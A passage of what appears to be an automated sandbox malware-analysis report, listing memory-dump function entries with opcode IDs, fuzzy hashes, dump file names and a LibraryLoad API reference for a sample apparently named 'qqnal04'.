                                                                                      • Opcode ID: 5bae23300891b904432fbf8812aff65dbbb7c0ccf455a791a5091feda7abc264
                                                                                      • Instruction ID: f60ca7ceba4dcd87f0e9968072467325756f32a2b8bbec04365c5ae2bcb34caa
                                                                                      • Opcode Fuzzy Hash: 5bae23300891b904432fbf8812aff65dbbb7c0ccf455a791a5091feda7abc264
                                                                                      • Instruction Fuzzy Hash: 8D52DF30A1DA4A8FE758AB289455379B7D1EF94B84F2440BDC45EC71C2EF2AEC42C785
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf1fadeb545a881bae14e998f03db9431add36dcdcdb34c25266c1a69575fe17
                                                                                      • Instruction ID: a0377d997e0d6f3e954b00292de9006abad7d680f62901e9402d9f60ec8e2537
                                                                                      • Opcode Fuzzy Hash: cf1fadeb545a881bae14e998f03db9431add36dcdcdb34c25266c1a69575fe17
                                                                                      • Instruction Fuzzy Hash: C9225831A0EE8A4FE795E738A8562B97BE1EF96350F0805BED04DC71D7DF1968028345
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dcc9f2f82fe5c09c93185e1c7c87b6e37f866a6c504c4d889d80d8a5863d97fc
                                                                                      • Instruction ID: 78b6fd14bab20b844af1d3397184fbd9547cc4c12f21478ae61905dfe5686d33
                                                                                      • Opcode Fuzzy Hash: dcc9f2f82fe5c09c93185e1c7c87b6e37f866a6c504c4d889d80d8a5863d97fc
                                                                                      • Instruction Fuzzy Hash: 9AF1943091CA8E8FEBA8EF28C8557E977D1FF58350F04426EE84DC7295DB34A9458B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1fe5c274a4e69494c0c4ebc263ca95ca5af6ac09e4bac78c2095b0d03cf79951
                                                                                      • Instruction ID: fe9b2e679887d1c9376a5e7744af47d43ce4da36e674d9a797f8ab4f4354f81a
                                                                                      • Opcode Fuzzy Hash: 1fe5c274a4e69494c0c4ebc263ca95ca5af6ac09e4bac78c2095b0d03cf79951
                                                                                      • Instruction Fuzzy Hash: F2E1A53090CA4E4FEBA8EF28D8557E977E1FF58350F04426ED84DC7291DB74A9448B85

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 115e1ec0ae78642ba7313f3c8ae564cedfb99486a7d66d69fffc365b9bde760b
                                                                                      • Instruction ID: e7a7273ac376e0a6d6cb23fb94408c3da6183f889f43347b867e814a532cdcb3
                                                                                      • Opcode Fuzzy Hash: 115e1ec0ae78642ba7313f3c8ae564cedfb99486a7d66d69fffc365b9bde760b
                                                                                      • Instruction Fuzzy Hash: D581C230908A4D4FEB98EF28D8597B977E1FF59340F14417AE84DC3292DF39A8818B85

                                                                                      Non-executed Functions

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (LH$-N_L$0
                                                                                      • API String ID: 0-31394361
                                                                                      • Opcode ID: 0fdb8585eb1403d856129f30505b5fe548b19d6dd0d488dae4463c9fb47245c9
                                                                                      • Instruction ID: 223ee5b88e4b38324fc5466a6932bfd28af54bc0f01c7bddac351d6c6d56f72a
                                                                                      • Opcode Fuzzy Hash: 0fdb8585eb1403d856129f30505b5fe548b19d6dd0d488dae4463c9fb47245c9
                                                                                      • Instruction Fuzzy Hash: BCD19E31A0DA8A4FE75DEB2894555B97BD1EF96360F0445BED88AC71D3DE28AC038380